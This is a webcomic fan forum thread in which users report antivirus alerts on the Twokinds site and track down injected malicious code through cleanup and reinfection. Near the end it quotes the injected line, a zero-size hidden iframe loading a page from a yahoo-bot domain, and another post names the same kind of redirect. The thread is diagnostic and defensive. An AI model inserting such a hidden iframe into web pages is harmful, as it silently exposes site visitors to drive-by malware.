Virus on 2kinds homepage?
Moderator: Moderators
Virus on 2kinds homepage?
First time I've ever seen this, when going to the 2kinds home page (not the forums) my antivirus program pops up with this:
This is the first time I've ever seen this. I doubt it's an *actual* virus, but I'd like to know what it is anyways.
*edited for bigger and less crappy picture*
This is the first time I've ever seen this. I doubt it's an *actual* virus, but I'd like to know what it is anyways.
*edited for bigger and less crappy picture*
-
- The Inkwell Coyote
- Posts: 9458
- Joined: Wed Aug 09, 2006 9:28 pm
Re: Virus on 2kinds homepage?
Looks like this problem is pinging a lot of people's virus scans, which suggests it isn't a fluke. Thanks for the screenshot, this was more than my Avast offered me.
I did some digging and found a forum thread about the script in question: http://forum.avast.com/index.php?topic=43676.0
EDIT: I got a hold of Tom, he reset the scripts and it looks like the bugaboo is gone. He thinks a bot probably inserted it rather than any particular person, which sounds more plausible than some random guy in Portugal haxxoring to the maxxors. Ah well, I'm hardware, he's software, XD
PROBLEM FEEXED.
I did some digging and found a forum thread about the script in question: http://forum.avast.com/index.php?topic=43676.0
Your site has been hacked there is a hidden iFrame tag inserted just after the opening Body tag
See image of the code, I have broken it down to make it easier to view (it was on a single line).
Note: there is a couple of <script> tags inserted after the closing html tag and a <noscript> tag, a standards, no, no. These however aren't what avast is alerting on but the hidden iframe.
So my best guess is the front page of the website has been hacked. Since Nanaki isn't around to help, best bet is to get into contact with Tom. He needs to check the site scripts and make sure someone looks at it.</body>
</html>
<!-- text below generated by server. PLEASE REMOVE --><!-- Counter/Statistics data collection code --><script language="JavaScript" src="http://us.js2.yimg.com/us.js.yimg.com/l ... pt><script language="javascript">geovisit();</script><noscript><img src="http://visit.webhosting.yahoo.com/visit ... 1238001167" alt="setstats" border="0" width="1" height="1"></noscript>
EDIT: I got a hold of Tom, he reset the scripts and it looks like the bugaboo is gone. He thinks a bot probably inserted it rather than any particular person, which sounds more plausible than some random guy in Portugal haxxoring to the maxxors. Ah well, I'm hardware, he's software, XD
PROBLEM FEEXED.
Re: Virus on 2kinds homepage?
Are you sure we can't blame Phoenix Requiem for this? I mean, we /did/ just eight rankings in a matter of hours. They're probably terrified.
In all seriousness though, great save!
In all seriousness though, great save!
[Working on making myself a siggy...]
Ask not what your country can do for you. It's broke too.
Ask not what your country can do for you. It's broke too.
-
- Templar GrandMaster
- Posts: 706
- Joined: Fri Dec 08, 2006 7:06 am
- Location: Behind my computer.
- Contact:
Re: Virus on 2kinds homepage? Edit: Fixed now
Nope, this is all just a fluke. I took a look at the code in the JS file above - perfectly safe.
The snippet of code is simply a Yahoo hit-counter. Nothing to be worried about.
edit:
However, as aj brought up to me on IRC, the code in the archives is different. I just took a look at that, and while I didn't follow the code through a bunch of redirects, I am positive it is up to no good.
-RobbieThe1st
The snippet of code is simply a Yahoo hit-counter. Nothing to be worried about.
edit:
However, as aj brought up to me on IRC, the code in the archives is different. I just took a look at that, and while I didn't follow the code through a bunch of redirects, I am positive it is up to no good.
-RobbieThe1st
Re: Virus on 2kinds homepage? Edit: Fixed now
Just like that annoying foot fungus that keep reappearing no matter what you do, it's bbbbaaaaaaaaaaaaaaacccccccccccckkkkkkkkkkkkkkkk.
Main page:
Archive listing page:
Yep, something is there alright.
Those of you with Firefox, grab the NoScript extension here. Seems to suppress it. Also, Google seems to have picked it up and appears to be blocking it (if you've left the "Tell me if the site I'm visiting is an attack site" option enabled in Firefox, that is.)
People don't venture into the Tech Board as often as they do the FAQ Board, so cross-posted there for confirmation. (If I am in violation of a rule, please tell me mods? Also, someone may want to change the title of this topic. )
---
Edit: adding information posted in the FAQ board - on second thought, maybe not such a good idea to post in multiple places. >.>
Ok, a bunch of pages are infected:
The archive listing - twokindscomic.com/archive.html
The archives themselves - twokindscomic.com/index.php
Main page - 2kinds.com
Characters page - 2kinds.com/characters.htm
News page - 2kinds.com/news_v2.htm
"Today's" comic page - 2kinds.com/todayscomic.htm
In each case, it's iframes pointing to yahoo-bot.org/in.cgi?4 .
Anyone see any other pages?
(Check to make sure that you're opening them in their own tab - not loading on the main page, because that'll be a false positive. The main page itself is infected, and clicking the link without opening a new tab just loads it in a frame on the main page.)
As to why people are getting multiple warning about the front page - it's actually made up of 3 pages. The main page itself, today's comic page and the news page. Each of those 3 are infected. Hence, 3 warnings.
Yes, this is another infection people.
Main page:
Archive listing page:
Yep, something is there alright.
Those of you with Firefox, grab the NoScript extension here. Seems to suppress it. Also, Google seems to have picked it up and appears to be blocking it (if you've left the "Tell me if the site I'm visiting is an attack site" option enabled in Firefox, that is.)
People don't venture into the Tech Board as often as they do the FAQ Board, so cross-posted there for confirmation. (If I am in violation of a rule, please tell me mods? Also, someone may want to change the title of this topic. )
---
Edit: adding information posted in the FAQ board - on second thought, maybe not such a good idea to post in multiple places. >.>
Ok, a bunch of pages are infected:
The archive listing - twokindscomic.com/archive.html
The archives themselves - twokindscomic.com/index.php
Main page - 2kinds.com
Characters page - 2kinds.com/characters.htm
News page - 2kinds.com/news_v2.htm
"Today's" comic page - 2kinds.com/todayscomic.htm
In each case, it's iframes pointing to yahoo-bot.org/in.cgi?4 .
Anyone see any other pages?
(Check to make sure that you're opening them in their own tab - not loading on the main page, because that'll be a false positive. The main page itself is infected, and clicking the link without opening a new tab just loads it in a frame on the main page.)
As to why people are getting multiple warning about the front page - it's actually made up of 3 pages. The main page itself, today's comic page and the news page. Each of those 3 are infected. Hence, 3 warnings.
Yes, this is another infection people.
y̸̶o͏͏ų̕ sh̡o̸̵u̶̕l̴d̵̡n̵͠'̵́͠t͜͢ ̀͜͝h̶̡àv̸e͡ ̛d̷̨͡o͏̀ne ̶͠͡t҉́h̕a̧͞t̨҉́.̵̧͞.͠͞.͟avwolf wrote:"No dating dog-girls, young man, your father is terribly allergic!"
Re: Virus on 2kinds homepage? Edit: Fixed now
my antivir still reports a trojan (in three different files) on the main and one on the archive pages. there must have been a second infection after the reset.
[under construction]
Re: Virus on 2kinds homepage? Edit: Fixed now
Virus is cleared up now.
y̸̶o͏͏ų̕ sh̡o̸̵u̶̕l̴d̵̡n̵͠'̵́͠t͜͢ ̀͜͝h̶̡àv̸e͡ ̛d̷̨͡o͏̀ne ̶͠͡t҉́h̕a̧͞t̨҉́.̵̧͞.͠͞.͟avwolf wrote:"No dating dog-girls, young man, your father is terribly allergic!"
-
- The Inkwell Coyote
- Posts: 9458
- Joined: Wed Aug 09, 2006 9:28 pm
Re: Virus on 2kinds homepage? Edit: Fixed now
To prevent future trojans from infecting your servers, please be sure to use proper protection.aj wrote:Virus is cleared up now.
Re: Virus on 2kinds homepage? Edit: Fixed now
Well... I was thinking more along the lines of this type of protection, but whatever works.FastChapter wrote:To prevent future trojans from infecting your servers, please be sure to use proper protection.aj wrote:Virus is cleared up now.
Seriously though, I'm guessing it's server-side, which means it may happen again, and we can't do anything about it. (Sage says he's experienced repeated hacks on the same webhost too. )
y̸̶o͏͏ų̕ sh̡o̸̵u̶̕l̴d̵̡n̵͠'̵́͠t͜͢ ̀͜͝h̶̡àv̸e͡ ̛d̷̨͡o͏̀ne ̶͠͡t҉́h̕a̧͞t̨҉́.̵̧͞.͠͞.͟avwolf wrote:"No dating dog-girls, young man, your father is terribly allergic!"
- Lief
- No hugs, I asplode.
- Posts: 3871
- Joined: Wed May 06, 2009 5:37 am
- Location: Somewhere, I'm sure.
- Fav. Twokinds Character: Raine
Re: Virus on 2kinds homepage? Edit: Fixed now
Its back...in the news section (I only know because I told my antivir to deny access and the news section wouldn't load afterwards) I don't have a screenshot or anything like that unfortunately, I hadn't thought to get one at the time
EDIT: It be fixed for now...as far as I can tell anyways
EDIT: It be fixed for now...as far as I can tell anyways
Re: Virus on 2kinds homepage? Edit: Fixed now
Mmm.... can't see anything myself. Maybe it was a cached copy or something?
y̸̶o͏͏ų̕ sh̡o̸̵u̶̕l̴d̵̡n̵͠'̵́͠t͜͢ ̀͜͝h̶̡àv̸e͡ ̛d̷̨͡o͏̀ne ̶͠͡t҉́h̕a̧͞t̨҉́.̵̧͞.͠͞.͟avwolf wrote:"No dating dog-girls, young man, your father is terribly allergic!"
- Lief
- No hugs, I asplode.
- Posts: 3871
- Joined: Wed May 06, 2009 5:37 am
- Location: Somewhere, I'm sure.
- Fav. Twokinds Character: Raine
Re: Virus on 2kinds homepage? Edit: Fixed now
Who knows, I checked about an hour later and the news section was loading fine, meaning my antivir unblocked/whatever'd it XD thats around when I edited my post up thar
-
- Newbie
- Posts: 3
- Joined: Thu Apr 30, 2009 11:51 pm
Re: Virus on 2kinds homepage? Edit: Fixed now
Uh oh, it's back.
Sorry in advance for the big post; the pictures are big.
Upon visiting, I get the Google Warning:
image at http://i42.tinypic.com/11wg088.png
Then, when I click the I understand, Proceed Anyway thing, I get another Google Warning:
image at http://i40.tinypic.com/15oyvrb.png
(avast! also claimed it was a Trojan on the visit and aborted, but it isn't anymore for some reason...)
So naturally, I visited the diagnostics page:
image at http://i43.tinypic.com/ibvot3.png[/img]
To be honest, it didn't seem that bad. But it seems to be affiliated with yahoo-bot.org:
image at http://i44.tinypic.com/2hznw2p.png[/img]
Anyways, it's all caused by this little line in the page source:
</head>
<body><iframe src="http://yahoo-bot.net/in.cgi?2" width="0" height="0" frameborder="0"></iframe>
<table border="0" cellspacing="0" cellpadding="0"
I'm assuming the front page was hijacked...?
Edit: Fixed
Sorry in advance for the big post; the pictures are big.
Upon visiting, I get the Google Warning:
image at http://i42.tinypic.com/11wg088.png
Then, when I click the I understand, Proceed Anyway thing, I get another Google Warning:
image at http://i40.tinypic.com/15oyvrb.png
(avast! also claimed it was a Trojan on the visit and aborted, but it isn't anymore for some reason...)
So naturally, I visited the diagnostics page:
image at http://i43.tinypic.com/ibvot3.png[/img]
To be honest, it didn't seem that bad. But it seems to be affiliated with yahoo-bot.org:
image at http://i44.tinypic.com/2hznw2p.png[/img]
Anyways, it's all caused by this little line in the page source:
</head>
<body><iframe src="http://yahoo-bot.net/in.cgi?2" width="0" height="0" frameborder="0"></iframe>
<table border="0" cellspacing="0" cellpadding="0"
I'm assuming the front page was hijacked...?
Edit: Fixed